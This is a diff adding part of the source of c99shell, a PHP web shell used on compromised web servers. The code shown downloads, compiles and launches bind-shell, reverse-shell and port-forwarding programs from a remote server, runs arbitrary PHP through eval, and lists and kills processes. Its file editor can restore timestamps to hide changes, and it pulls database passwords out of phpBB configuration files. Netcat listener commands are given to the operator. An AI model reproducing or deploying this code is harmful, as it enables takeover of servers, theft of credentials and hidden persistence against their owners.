+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 0;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+if ($act == "tools")
+{
+ $bndportsrcs = array(
+  "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"),
+  "c99sh_bindport.c"=>array("Using C","%path %port %pass")
+ );
+ $bcsrcs = array(
+  "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"),
+  "c99sh_backconn.c"=>array("Using C","%path %host %port")
+ );
+ $dpsrcs = array(
+  "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"),
+  "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost")
+ );
+ if (!is_array($bind)) {$bind = array();}
+ if (!is_array($bc)) {$bc = array();}
+ if (!is_array($datapipe)) {$datapipe = array();}
+ 
+ if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;}
+ if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;}
+  
+ if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");}
+ if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;}
+ 
+ if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";}
+ if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;}
+ if (!empty($bindsubmit))
+ {
+  echo "<b>Result of binding port:</b><br>";
+  $v = $bndportsrcs[$bind["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $w = explode(".",$bind["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath);  @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%port",$bind["port"],$v[1]);
+    $v[1] = str_replace("%pass",$bind["pass"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";}
+    else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ if (!empty($bcsubmit))
+ {
+  echo "<b>Result of back connection:</b><br>";
+  $v = $bcsrcs[$bc["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  else
+  {
+   $w = explode(".",$bc["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%host",$bc["host"],$v[1]);
+    $v[1] = str_replace("%port",$bc["port"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>";
+   }
+  }
+ }
+ if (!empty($dpsubmit))
+ {
+  echo "<b>Result of datapipe-running:</b><br>";
+  $v = $dpsrcs[$datapipe["src"]];
+  if (empty($v)) {echo "Unknown file!<br>";}
+  elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";}
+  else
+  {
+   $srcpath = $tmpdir.$datapipe["src"];
+   $w = explode(".",$datapipe["src"]);
+   $ext = $w[count($w)-1];
+   unset($w[count($w)-1]);
+   $srcpath = join(".",$w).".".rand(0,999).".".$ext;
+   $binpath = $tmpdir.join(".",$w).rand(0,999);
+   if ($ext == "pl") {$binpath = $srcpath;}
+   @unlink($srcpath);
+   $fp = fopen($srcpath,"ab+");
+   if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";}
+   elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";}
+   else
+   {
+    fwrite($fp,$data,strlen($data));
+    fclose($fp);
+    if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);}
+    list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]);
+    $v[1] = str_replace("%path",$binpath,$v[1]);
+    $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]);
+    $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]);
+    $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]);
+    $v[1] = str_replace("//","/",$v[1]);
+    $retbind = myshellexec($v[1]." > /dev/null &");
+    sleep(5);
+    $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5);
+    if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";}
+    else {echo "Running datapipe... ok! Connect to <b>".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View datapipe process</u></a></center>";}
+   }
+   echo "<br>";
+  }
+ }
+ ?><b>Binding port:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">Port: <input type=text name="bind[port]" value="<?php echo htmlspecialchars($bind["port"]); ?>">&nbsp;Password: <input type=text name="bind[pass]" value="<?php echo htmlspecialchars($bind["pass"]); ?>">&nbsp;<select name="bind[src]"><?php
+ foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+ ?></select>&nbsp;<input type=submit name=bindsubmit value="Bind"></form>
+<b>Back connection:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="bc[host]" value="<?php echo htmlspecialchars($bc["host"]); ?>">&nbsp;Port: <input type=text name="bc[port]" value="<?php echo htmlspecialchars($bc["port"]); ?>">&nbsp;<select name="bc[src]"><?php
+foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=bcsubmit value="Connect"></form>
+Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p <?php echo $bc_port; ?></b>"!<br><br>
+<b>Datapipe:</b><br><form action="<?php echo $surl; ?>"><input type=hidden name=act value=tools><input type=hidden name=d value="<?php echo $d; ?>">HOST: <input type=text name="datapipe[remoteaddr]" value="<?php echo htmlspecialchars($datapipe["remoteaddr"]); ?>">&nbsp;Local port: <input type=text name="datapipe[localport]" value="<?php echo htmlspecialchars($datapipe["localport"]); ?>">&nbsp;<select name="datapipe[src]"><?php
+foreach($dpsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc["src"]) {echo " selected";} echo ">".$v[0]."</option>";}
+?></select>&nbsp;<input type=submit name=dpsubmit value="Run"></form><b>Note:</b> sources will be downloaded from remote server.<?php
+}
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+	{
+	 echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","	",$ret);}
+   while (ereg("		",$ret)) {$ret = str_replace("		","	",$ret);}
+   while (ereg("	 ",$ret)) {$ret = str_replace("	 ","	",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("	",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" height=\"9\" width=\"14\" border=\"0\"></a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("	",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
+  $tmp = ob_get_contents();
+  $olddir = realpath(".");
+  @chdir($d);
+  if ($tmp)
+  {
+   ob_clean();
+   eval($eval);
+   $ret = ob_get_contents();
+   $ret = convert_cyr_string($ret,"d","w");
+   ob_clean();
+   echo $tmp;
+   if ($eval_txt)
+   {
+    $rows = count(explode("\r\n",$ret))+1;
+    if ($rows < 10) {$rows = 10;}
+    echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+   }
+   else {echo $ret."<br>";}
+  }
+  else
+  {
+   if ($eval_txt)
+   {
+    echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
+    eval($eval);
+    echo "</textarea>";
+   }
+   else {echo $ret;}
+  }
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
+}
+if ($act == "f")
+{
+ if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit")
+ {
+  if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
+  else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
+ }
+ else
+ {
+  $r = @file_get_contents($d.$f);
+  $ext = explode(".",$f);
+  $c = count($ext)-1;
+  $ext = $ext[$c];
+  $ext = strtolower($ext);
+  $rft = "";
+  foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
+  if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
+  if (empty($ft)) {$ft = $rft;}
+  $arr = array(
+   array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
+   array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
+   array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
+   array("Code","code"),
+   array("Session","phpsess"),
+   array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
+   array("SDB","sdb"),
+   array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
+   array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
+   array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
+   array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
+   array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
+  );
+  echo "<b>Viewing file:&nbsp;&nbsp;&nbsp;&nbsp;<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$f." (".view_size(filesize($d.$f)).") &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
+  foreach($arr as $t)
+  {
+   if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
+   elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
+   else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
+   echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
+  }
+  echo "<hr size=\"1\" noshade>";
+  if ($ft == "info")
+  {
+   echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
+   if (!$win)
+   {
+    echo "<tr><td><b>Owner/Group</b></td><td> ";    
+    $ow = posix_getpwuid(fileowner($d.$f));
+    $gr = posix_getgrgid(filegroup($d.$f));
+    echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
+   }
+   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table><br>";
+   $fi = fopen($d.$f,"rb");
+   if ($fi)
+   {
+    if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
+    else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
+    $n = 0;
+    $a0 = "00000000<br>";
+    $a1 = "";
+    $a2 = "";
+    for ($i=0; $i<strlen($str); $i++)
+    {
+     $a1 .= sprintf("%02X",ord($str[$i]))." ";
+     switch (ord($str[$i]))
+     {
+      case 0:  $a2 .= "<font>0</font>"; break;
+      case 32:
+      case 10:
+      case 13: $a2 .= "&nbsp;"; break;
+      default: $a2 .= htmlspecialchars($str[$i]);
+     }
+     $n++;
+     if ($n == $hexdump_rows)
+     {
+      $n = 0;
+      if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
+      $a1 .= "<br>";
+      $a2 .= "<br>";
+     }
+    }
+    //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."<br>";}
+    echo "<table border=0 bgcolor=#666666 cellspacing=1 cellpadding=4><tr><td bgcolor=#666666>".$a0."</td><td bgcolor=000000>".$a1."</td><td bgcolor=000000>".$a2."</td></tr></table><br>";
+   }
+   $encoded = "";
+   if ($base64 == 1)
+   {
+    echo "<b>Base64 Encode</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+   }
+   elseif($base64 == 2)
+   {
+    echo "<b>Base64 Encode + Chunk</b><br>";
+    $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
+   }
+   elseif($base64 == 3)
+   {
+    echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
+    $encoded = base64_encode(file_get_contents($d.$f));
+    $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
+   }
+   elseif($base64 == 4)
+   {
+    $text = file_get_contents($d.$f);
+    $encoded = base64_decode($text);
+    echo "<b>Base64 Decode";
+    if (base64_encode($encoded) != $text) {echo " (failed)";}
+    echo "</b><br>";
+   }
+   if (!empty($encoded))
+   {
+    echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
+   }
+   echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>]&nbsp;</nobr>
+<nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>]&nbsp;</nobr>
+<P>";
+  }
+  elseif ($ft == "html")
+  {
+   if ($white) {@ob_clean();}
+   echo $r;
+   if ($white) {c99shexit();}
+  }
+  elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
+  elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,true)); echo "</pre>";}
+  elseif ($ft == "phpsess")
+  {
+   echo "<pre>";
+   $v = explode("|",$r);
+   echo $v[0]."<br>";
+   var_dump(unserialize($v[1]));
+   echo "</pre>";
+  }
+  elseif ($ft == "exe")
+  {
+   $ext = explode(".",$f);
+   $c = count($ext)-1;
+   $ext = $ext[$c];
+   $ext = strtolower($ext);
+   $rft = "";
+   foreach($exeftypes as $k=>$v)
+   {
+    if (in_array($ext,$v)) {$rft = $k; break;}
+   }
+   $cmd = str_replace("%f%",$f,$rft);
+   echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
+  }
+  elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
+  elseif ($ft == "code")
+  {
+   if (ereg("php"."BB 2.(.*) auto-generated config file",$r))
+   {
+    $arr = explode("\n",$r);
+    if (count($arr == 18))
+    {
+     include($d.$f);
+     echo "<b>phpBB configuration is detected in this file!<br>";
+     if ($dbms == "mysql4") {$dbms = "mysql";}
+     if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
+     else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";}
+     echo "Parameters for manual connect:<br>";
+     $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
+     foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
+     echo "</b><hr size=\"1\" noshade>";
+    }
+   }
+   echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
+   if (!empty($white)) {@ob_clean();}
+   highlight_file($d.$f);
+   if (!empty($white)) {c99shexit();}
+   echo "</div>";
+  }
+  elseif ($ft == "download")
+  {
+   @ob_clean();
+   header("Content-type: application/octet-stream");
+   header("Content-length: ".filesize($d.$f));
+   header("Content-disposition: attachment; filename=\"".$f."\";");
+   echo $r;
+   exit;
+  }
+  elseif ($ft == "notepad")
+  {
+   @ob_clean();
+   header("Content-type: text/plain");
+   header("Content-disposition: attachment; filename=\"".$f.".txt\";");
+   echo($r);
+   exit;
+  }
+  elseif ($ft == "img")
+  {
+   $inf = getimagesize($d.$f);
+   if (!$white)
+   {
+    if (empty($imgsize)) {$imgsize = 20;}
+    $width = $inf[0]/100*$imgsize;
+    $height = $inf[1]/100*$imgsize;
+    echo "<center><b>Size:</b>&nbsp;";
+    $sizes = array("100","50","20");
+    foreach ($sizes as $v)
+    {
+     echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
+     if ($imgsize != $v ) {echo $v;}
+     else {echo "<u>".$v."</u>";}
+     echo "</a>&nbsp;&nbsp;&nbsp;";
+    }
+    echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
+   }
+   else
+   {
+    @ob_clean();
+    $ext = explode($f,".");
+    $ext = $ext[count($ext)-1];
+    header("Content-type: ".$inf["mime"]);
+    readfile($d.$f);
+    exit;
+   }
+  }
+  elseif ($ft == "edit")
+  {
+   if (!empty($submit))
+   {
+    if ($filestealth) {$stat = stat($d.$f);}
+    $fp = fopen($d.$f,"w");
+    if (!$fp) {echo "<b>Can't write to file!</b>";}
+    else
+    {
+     echo "<b>Saved!</b>";
+     fwrite($fp,$edit_text);
+     fclose($fp);
+     if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
+     $r = $edit_text;
+    }
+   }
+   $rows = count(explode("\r\n",$r));
+   if ($rows < 10) {$rows = 10;}
+   if ($rows > 30) {$rows = 30;}
+   echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\">&nbsp;<input type=\"reset\" value=\"Reset\">&nbsp;<input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
+  }
+  elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
+  else {echo "<center><b>Unknown extension (".$ext."), please, select type manually.</b></center>";}
+ }
+}
+}
+else
+{
+ @ob_clean();
+ $images = array(
+"arrow_ltr"=>
+"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
+"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
+"back"=>
+"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
